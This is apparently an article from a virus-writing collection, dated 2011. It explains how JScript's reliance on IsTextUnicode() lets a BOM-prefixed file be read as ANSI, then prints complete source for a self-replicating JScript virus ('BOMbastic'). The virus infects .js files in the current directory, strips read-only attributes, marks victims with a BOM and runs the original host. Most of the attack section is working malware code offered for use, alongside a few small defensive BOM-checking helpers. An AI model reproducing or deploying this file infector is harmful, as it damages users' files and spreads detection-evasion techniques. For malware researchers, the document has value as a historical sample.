roy g biv
February 2011
- What is a BOM?
- Why should we care?
- Great, can we do that?
- Okay, let's do it!
- Unicode in files
- Greets to friendly people (A-Z)
What is a BOM?
It's not the thing that explodes. That's a BOMB. Heh. BOM is Byte Order Mark. Some Unicode files use the Byte Order Mark to say that they are Unicode, and to say the order of the bytes (little-endian or big-endian). I say "some Unicode files" because there are exceptions, and one of those exceptions is very interesting: VBScript and JScript. Yes, Microsoft scripting technologies do not care whether the BOM is present or not (delete the BOM and see for yourself!). They detect Unicode format using a special API called IsTextUnicode().
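To make the BOM idea concrete, here is a minimal sketch that classifies the first bytes of a file. The function name detectBom is hypothetical and not part of the original article, and the sketch only knows the UTF-16 and UTF-8 marks. It takes a plain array of byte values so that it does not depend on any particular file API.

```javascript
// Hypothetical helper (not from the article): classify the BOM at the
// start of an array of byte values.
// Returns "UTF-16LE", "UTF-16BE", "UTF-8", or null when no BOM is found.
function detectBom(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0xff && bytes[1] === 0xfe) {
    return "UTF-16LE"; // FF FE: little-endian UTF-16
  }
  if (bytes.length >= 2 && bytes[0] === 0xfe && bytes[1] === 0xff) {
    return "UTF-16BE"; // FE FF: big-endian UTF-16
  }
  if (bytes.length >= 3 && bytes[0] === 0xef && bytes[1] === 0xbb && bytes[2] === 0xbf) {
    return "UTF-8"; // EF BB BF: UTF-8 signature
  }
  return null; // no recognised BOM
}
```

A tool that trusts only this kind of check will report "Unicode" for any file that starts with FF FE, whatever the rest of the file contains.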
Why should we care?
The special thing about the IsTextUnicode() API is that it can only guess if a file is Unicode format or ANSI format. It cannot say for sure, so if we can put a BOM in the front of the file but force the API to return ANSI format, then we can put lots of Unicode in the file to fool people and some tools.
Great, can we do that?
Of course :) but only for JScript. :(
The IsTextUnicode() API takes three parameters: lpBuffer, cb, lpi. lpBuffer is a pointer to the buffer to examine, cb is the size of the buffer, and lpi is a pointer to a variable that contains flags to test on input, and it also receives the result on output. The API examines up to 256 bytes of the file, and then performs the tests that are requested. Microsoft scripting engines call the API with lots of flags to test, but only one is interesting for us: IS_TEXT_UNICODE_ILLEGAL_CHARS. The engines also ignore the return value and check only if IS_TEXT_UNICODE_ILLEGAL_CHARS is set.
If we put an illegal Unicode character in the first 256 bytes of the file, then the engines will think that the file is in ANSI format, even if there is a BOM in the front of the file. Meanwhile, everyone else will still think that the file is in Unicode format.
The characters that are considered to be illegal are 0x0a0d, 0xfeff, 0xffff (only in little-endian format)... and 0x0000. Who remembers my "Pretext" virus from 2002? I used there a technique that I call "tar-script". Microsoft's scripting engines calculate the length of a script by using strlen() function. This means that when a 0 is found, no more file is examined, so if our script ends with a 0 then we can append anything to it and no errors will happen. In this case, we use double-zero to make illegal Unicode character, and still work for ANSI case.
In ANSI mode, BOM can be used for variable name in JScript files. Of course, 256 bytes is not enough for the virus, so the host must be made into "sandwich" where virus code is at start and end, and host code is in the middle.
Okay, let's do it!
Except that it doesn't work. Since the JScript engine is not intended to support something like this, I should not call it a bug. When I tried to write the host code to disk in order to run it, a section of the file was all zeroes. The number of zeroes there depended on the size of the host code. If the code was larger then more zeroes, if smaller then fewer zeroes. The host could not be run when like that. Also, if the host code was large enough, the sandwich code did not run either. So I had to think of another way. It was very simple solution after all. I just had to make the file size odd so that it could not possibly be Unicode format. The simplest way to do that is to make the virus code even and append a single character after the host. The virus code size must be even so that the host code is visible.
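The odd-size observation is also easy to check from the outside: UTF-16 text is made of 2-byte units, so a file that opens with a UTF-16 BOM but has an odd byte count cannot be plain UTF-16. A minimal sketch of that check follows. The function name is hypothetical and not from the original article, and the input is assumed to be an array of byte values.

```javascript
// Hypothetical check (illustrative name, not from the article):
// report files that start with a UTF-16 BOM but whose size is odd,
// which is inconsistent with a stream of 2-byte UTF-16 code units.
function hasUtf16BomButOddSize(bytes) {
  var hasBom = bytes.length >= 2 &&
    ((bytes[0] === 0xff && bytes[1] === 0xfe) ||  // UTF-16LE mark
     (bytes[0] === 0xfe && bytes[1] === 0xff));   // UTF-16BE mark
  return hasBom && bytes.length % 2 === 1;
}
```

A scanner or editor could use a test like this as a cheap hint that a file's BOM and its real content disagree.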
Unicode in files
It is interesting that I could not find a way to force the scripting engines to write Unicode strings. They always seem to call WideCharToMultiByte() before writing, because all strings are in Unicode format internally. If I read from a file, the engines always seem to call MultiByteToWideChar(), no matter what the format of the data is. If the data were Unicode already, then they become "double-Unicode". It's very weird, so I had to convert to Unicode on my own.
Let's see the code.
<BOM>="BOMbastic - roy g biv 01/02/11"
a=new ActiveXObject("scripting.filesystemobject")
try
{
c=a.opentextfile(b=WScript.scriptfullname) //open host
d=c.read(750) //read virus code. 750 is size of virus with no comments or spaces
//if you change the size of code, then you must change this value
e=a.getfile(b) //get our file object
f=c.readall() //read rest of host file
c=e.attributes //save attributes
e.attributes=0 //remove any read-only attribute
g=a.createtextfile(b) //make new host
for(h=0;h<f.length-1;h+=2)
g.write(f.substr(h,1)) //convert Unicode to ANSI and write host
g.close() //close host to allow run later
e.attributes=c //restore attributes
}
catch(z)
{
}
for(c=new Enumerator(a.getfolder(".").files);!c.atEnd();c.moveNext())
//demo version, current directory only
{
e=c.item()
if(b!=e&&a.getextensionname(e).toLowerCase()=="js")
try
{
f=a.opentextfile(e) //open potential victim
g=f.read(1) //read first character, keep for later
if(g!="/xff") //check for BOM (used as infection marker)
try
{
h=g+f.readall() //read entire file
i=e.attributes //save attributes
e.attributes=0 //remove any read-only attribute
j=a.createtextfile(e) //open file for writing
j.write(d) //prepend to file
for(k=0;k<h.length;++k)
j.write(h.substr(k,1)+"/0") //convert ANSI to Unicode and write host
j.write("r")
j.close() //close file (write mode)
e.attributes=i //restore attributes
}
catch(z)
{
}
f.close() //close file (read mode)
}
catch(z)
{
}
}
new ActiveXObject("wscript.shell").exec("wscript "+b)
//run host
<0 here>
Greets to friendly people (A-Z)
Active - Benny - herm1t - hh86 - izee - jqwerty - Malum - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna - Whitehead
Source: http://vx.netlux.org/lib/vrg07.html